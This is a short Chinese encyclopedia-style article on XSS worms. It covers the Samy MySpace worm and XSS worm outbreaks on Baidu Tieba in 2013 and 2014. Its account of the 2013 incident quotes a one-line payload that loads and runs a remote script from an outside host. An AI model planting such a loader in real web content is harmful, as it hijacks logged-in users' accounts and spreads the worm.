XSS蠕虫

✍ dations ◷ 2025-11-13 16:43:34 #注入漏洞,蠕虫病毒

xss蠕虫(cross site scripting worm)是一种跨站病毒,通常由脚本语言Javascript写成,它借由网站访问者传播

历史第一个XSS蠕虫是针对网站Myspace的Samy,它在20小时内感染了100万个账户,作者Samy Kamkar之后被起诉

见对新浪微博的争议#XSS.E6.BC.8F.E6.B4.9E

2013年5月19日, 百度贴吧转帖功能再度出现xss漏洞,大量贴吧内充斥接近满版面, 包含代码getScript('//xss.retaker.me/1.js')为标题的帖子,当已登陆用户打开这样的帖子,用户所持账户便以相同方式在多个贴吧转帖原作者的帖,部分网络安全相关人士认为贴吧爆发了大规模XSS蠕虫感染

2014年3月9日, 百度贴吧转帖功能再度出现xss漏洞

由于XSS蠕虫基于浏览器而不是操作系统,取决于其依赖网站的规模,它可以在短时间内达到对巨大数量的计算机感染

相关

  • 斯巴达国王列表斯巴达是古希腊最重要的城邦国家之一,在所有希腊城邦国家中领土最广大。斯巴达实行非常独特的政治制度,即由来自两个王室的国王同时统治,两支王室的继承互不干扰。两个王室分别
  • 鱼肝油鱼肝油(也称“肝油”)是一种从鳕鱼等海洋鱼类肝脏中提取的油,通常为黄色到橙红色的透明油状液体,带有鱼腥味。1848年挪威开始用水蒸汽加热法制造鱼肝油。1880年日本采用水煮法制
  • 丹尼尔·那森斯丹尼尔·那森斯(Daniel Nathans,1928年10月30日-1999年11月16日)是一位美国分子生物学家。出生于美国德拉瓦州威尔明顿,其父母为俄罗斯犹太移民。那森斯于1954年获得圣路易斯华盛
  • 尿滞留尿潴留(英语:renal retention或 urinary retention),又称尿滞留、尿液滞留,是膀胱内的尿液无法排出的状况,最常见的原因是良性前列腺增生症。正常成年男性的膀胱涨满时,容积约为500
  • 2014年2014年被中华人民共和国处决的死刑犯列表,旨在列出2014年被中华人民共和国处决的死刑犯。
  • Ithaca伊萨卡(Ithaca)可以指:
  • 星火计划星火计划,是中华人民共和国一项依靠科技进步、振兴农村经济,普及科学技术、带动农民致富的指导性科技计划。是中国政府批准实施的第一个依靠科学技术促进农村经济发展的计划,是
  • 硝酸钽酰硝酸钽酰是一种无机化合物,化学式为TaO(NO3)3。硝酸钽酰由五氯化钽和五氧化二氮反应得到:
  • 韦斯利·马修斯韦斯利·马修斯(英语:Wesley Matthews,1986年10月14日-),美国职业篮球运动员,现效力于国家篮球协会(NBA)的密尔沃基雄鹿。他是前NBA球员威斯·马修斯(英语:Wes Matthews)的儿子。在场上
  • 坦干伊喀湖耀鲶坦干伊喀湖耀鲶,为辐鳍鱼纲鲶形目塘虱鱼科的其中一种,被IUCN列为濒危保育类动物,分布于非洲坦干伊喀湖流域,栖息在沙泥底质底层水域,体长可达11.8公分,生活习性不明。 维基物种中